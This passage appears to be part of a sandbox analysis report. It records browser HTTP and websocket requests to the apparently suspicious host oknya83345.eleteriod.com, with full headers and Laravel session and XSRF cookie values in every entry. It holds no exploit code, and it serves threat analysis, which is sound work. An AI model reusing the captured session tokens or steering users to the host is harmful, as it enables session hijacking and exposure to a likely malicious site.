        Source: global trafficHTTP traffic detected: GET /56p7yi2p9RpjhqPghDmZgIJwAIJYRIQSD89110 HTTP/1.1Host: oknya83345.eleteriod.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkdzWDYyODR6NmlZdjNJWXVjd3NjRWc9PSIsInZhbHVlIjoiRXFqNDJES1VuM2wvNXFzK3hnWmVkRFhSSHJZMGg0VVA3S2I1ZlowaWQyWVE4Y2kxMS9lVVNzbG9MOFBPWS9USWx4V0d5RjF3SU1NZGZkbm1VM214VXk0K0hQVkdwMGF6QW5qeGx6YWlJMHBVcE1HU3BaY2V3Tmp0RElWZjJxTHAiLCJtYWMiOiI1Yzc2ZmExYzU1OGFmMDc4MDFkMjFmZmM3ZjgwYjZhOTAyZjYwZmVhZGVkMGU1ZjM2N2FkODQwZmI2NTYzOTNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlIyV0dETU5HdGx4czVsb0RvNCtWbmc9PSIsInZhbHVlIjoiSVVDWEl2cVpDNVpDZk5rQnpjaXgzSXJScGliRGg1b2R1T2FmdEdvSDMxWmZnblJFczlNWW8ydlZkSEdGVnNwYVJqaVFxeDNOTjFDQ0ZOY0x2ZXBTdElMVTR2U3dUa3h5Wnc0Zk5aa0czK1lmQ1o3K2lPQ0xKTFZUT0dNRC8yblgiLCJtYWMiOiJkYzc5NzRlN2U4NWZjMTJhZDYzYzE5MWI5ZmQxY2I0NTQ5MjY2MGRhZWFmN2JkYzIwNjJkYmRhM2EzZGVhZjNjIiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: oknya83345.eleteriod.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://oknya83345.eleteriod.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkdzWDYyODR6NmlZdjNJWXVjd3NjRWc9PSIsInZhbHVlIjoiRXFqNDJES1VuM2wvNXFzK3hnWmVkRFhSSHJZMGg0VVA3S2I1ZlowaWQyWVE4Y2kxMS9lVVNzbG9MOFBPWS9USWx4V0d5RjF3SU1NZGZkbm1VM214VXk0K0hQVkdwMGF6QW5qeGx6YWlJMHBVcE1HU3BaY2V3Tmp0RElWZjJxTHAiLCJtYWMiOiI1Yzc2ZmExYzU1OGFmMDc4MDFkMjFmZmM3ZjgwYjZhOTAyZjYwZmVhZGVkMGU1ZjM2N2FkODQwZmI2NTYzOTNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlIyV0dETU5HdGx4czVsb0RvNCtWbmc9PSIsInZhbHVlIjoiSVVDWEl2cVpDNVpDZk5rQnpjaXgzSXJScGliRGg1b2R1T2FmdEdvSDMxWmZnblJFczlNWW8ydlZkSEdGVnNwYVJqaVFxeDNOTjFDQ0ZOY0x2ZXBTdElMVTR2U3dUa3h5Wnc0Zk5aa0czK1lmQ1o3K2lPQ0xKTFZUT0dNRC8yblgiLCJtYWMiOiJkYzc5NzRlN2U4NWZjMTJhZDYzYzE5MWI5ZmQxY2I0NTQ5MjY2MGRhZWFmN2JkYzIwNjJkYmRhM2EzZGVhZjNjIiwidGFnIjoiIn0%3DSec-WebSocket-Key: Z4gX+UlRSW/aRAy3ICFiig==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
        Source: global trafficHTTP traffic detected: GET /wxfP08DYvObNreEbp4GjSTvlE38mAqrBh9MigjTGODhm12130 HTTP/1.1Host: oknya83345.eleteriod.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkdzWDYyODR6NmlZdjNJWXVjd3NjRWc9PSIsInZhbHVlIjoiRXFqNDJES1VuM2wvNXFzK3hnWmVkRFhSSHJZMGg0VVA3S2I1ZlowaWQyWVE4Y2kxMS9lVVNzbG9MOFBPWS9USWx4V0d5RjF3SU1NZGZkbm1VM214VXk0K0hQVkdwMGF6QW5qeGx6YWlJMHBVcE1HU3BaY2V3Tmp0RElWZjJxTHAiLCJtYWMiOiI1Yzc2ZmExYzU1OGFmMDc4MDFkMjFmZmM3ZjgwYjZhOTAyZjYwZmVhZGVkMGU1ZjM2N2FkODQwZmI2NTYzOTNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlIyV0dETU5HdGx4czVsb0RvNCtWbmc9PSIsInZhbHVlIjoiSVVDWEl2cVpDNVpDZk5rQnpjaXgzSXJScGliRGg1b2R1T2FmdEdvSDMxWmZnblJFczlNWW8ydlZkSEdGVnNwYVJqaVFxeDNOTjFDQ0ZOY0x2ZXBTdElMVTR2U3dUa3h5Wnc0Zk5aa0czK1lmQ1o3K2lPQ0xKTFZUT0dNRC8yblgiLCJtYWMiOiJkYzc5NzRlN2U4NWZjMTJhZDYzYzE5MWI5ZmQxY2I0NTQ5MjY2MGRhZWFmN2JkYzIwNjJkYmRhM2EzZGVhZjNjIiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /ijyi2hjS5erxCGdTqsT8BtwI3rNaQaISKnbm7WopvWzN1oLZWZsUwUlQNCWPnDUtG3kZb3yz221 HTTP/1.1Host: oknya83345.eleteriod.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkdzWDYyODR6NmlZdjNJWXVjd3NjRWc9PSIsInZhbHVlIjoiRXFqNDJES1VuM2wvNXFzK3hnWmVkRFhSSHJZMGg0VVA3S2I1ZlowaWQyWVE4Y2kxMS9lVVNzbG9MOFBPWS9USWx4V0d5RjF3SU1NZGZkbm1VM214VXk0K0hQVkdwMGF6QW5qeGx6YWlJMHBVcE1HU3BaY2V3Tmp0RElWZjJxTHAiLCJtYWMiOiI1Yzc2ZmExYzU1OGFmMDc4MDFkMjFmZmM3ZjgwYjZhOTAyZjYwZmVhZGVkMGU1ZjM2N2FkODQwZmI2NTYzOTNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlIyV0dETU5HdGx4czVsb0RvNCtWbmc9PSIsInZhbHVlIjoiSVVDWEl2cVpDNVpDZk5rQnpjaXgzSXJScGliRGg1b2R1T2FmdEdvSDMxWmZnblJFczlNWW8ydlZkSEdGVnNwYVJqaVFxeDNOTjFDQ0ZOY0x2ZXBTdElMVTR2U3dUa3h5Wnc0Zk5aa0czK1lmQ1o3K2lPQ0xKTFZUT0dNRC8yblgiLCJtYWMiOiJkYzc5NzRlN2U4NWZjMTJhZDYzYzE5MWI5ZmQxY2I0NTQ5MjY2MGRhZWFmN2JkYzIwNjJkYmRhM2EzZGVhZjNjIiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /qrhxvaaCuXxcOYrCQYlWzLXpEpCeH8ghZociP8xffes67140 HTTP/1.1Host: oknya83345.eleteriod.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkdzWDYyODR6NmlZdjNJWXVjd3NjRWc9PSIsInZhbHVlIjoiRXFqNDJES1VuM2wvNXFzK3hnWmVkRFhSSHJZMGg0VVA3S2I1ZlowaWQyWVE4Y2kxMS9lVVNzbG9MOFBPWS9USWx4V0d5RjF3SU1NZGZkbm1VM214VXk0K0hQVkdwMGF6QW5qeGx6YWlJMHBVcE1HU3BaY2V3Tmp0RElWZjJxTHAiLCJtYWMiOiI1Yzc2ZmExYzU1OGFmMDc4MDFkMjFmZmM3ZjgwYjZhOTAyZjYwZmVhZGVkMGU1ZjM2N2FkODQwZmI2NTYzOTNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlIyV0dETU5HdGx4czVsb0RvNCtWbmc9PSIsInZhbHVlIjoiSVVDWEl2cVpDNVpDZk5rQnpjaXgzSXJScGliRGg1b2R1T2FmdEdvSDMxWmZnblJFczlNWW8ydlZkSEdGVnNwYVJqaVFxeDNOTjFDQ0ZOY0x2ZXBTdElMVTR2U3dUa3h5Wnc0Zk5aa0czK1lmQ1o3K2lPQ0xKTFZUT0dNRC8yblgiLCJtYWMiOiJkYzc5NzRlN2U4NWZjMTJhZDYzYzE5MWI5ZmQxY2I0NTQ5MjY2MGRhZWFmN2JkYzIwNjJkYmRhM2EzZGVhZjNjIiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /klB7kuQPnNOpgjTwJDNQWLIBBFa0XWEJbVMH8UZf3fXc0563H7XRHd32dCoJNir2Gheuv220 HTTP/1.1Host: oknya83345.eleteriod.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /ro9EGsgt7WhYocqNMxT5aKqWBswapyeJg6XDk6Wh1EcHQ86i HTTP/1.1Host: oknya83345.eleteriod.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /ef8d6X647wRncbASI7KK9wvH19moijIGgbX7RvbPNBqe0tonNY6Y78148 HTTP/1.1Host: oknya83345.eleteriod.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /klTwjvYzK7ZnXdGU0MmXwR8cdFcuUR6piy8Hoa78168 HTTP/1.1Host: oknya83345.eleteriod.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /wxGHOVhNfB9eJCYocFlGLnZU0vLUJmndqUTPYn2iQJMFdfQ8jFqkPab172 HTTP/1.1Host: oknya83345.eleteriod.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /rsivy0f9LvMVoGwWXBY36UNQHJ5vLvLswbmHYZghDjaLx4bHrm3aZHETrLuA4WzXtVHef198 HTTP/1.1Host: oknya83345.eleteriod.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /ghhzdSo0pCDRNfU983q6ExVmnoJ4rBpDRip5WrwOkA7XgKsbaoTE86uM12210 HTTP/1.1Host: oknya83345.eleteriod.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /wxfP08DYvObNreEbp4GjSTvlE38mAqrBh9MigjTGODhm12130 HTTP/1.1Host: oknya83345.eleteriod.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /qrRiGIunRIlmWDy4XNHkLCd9QMHuvoWva5jMdSjLAZIB0oQFclwOKeg98a9tc1j6cd240 HTTP/1.1Host: oknya83345.eleteriod.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; 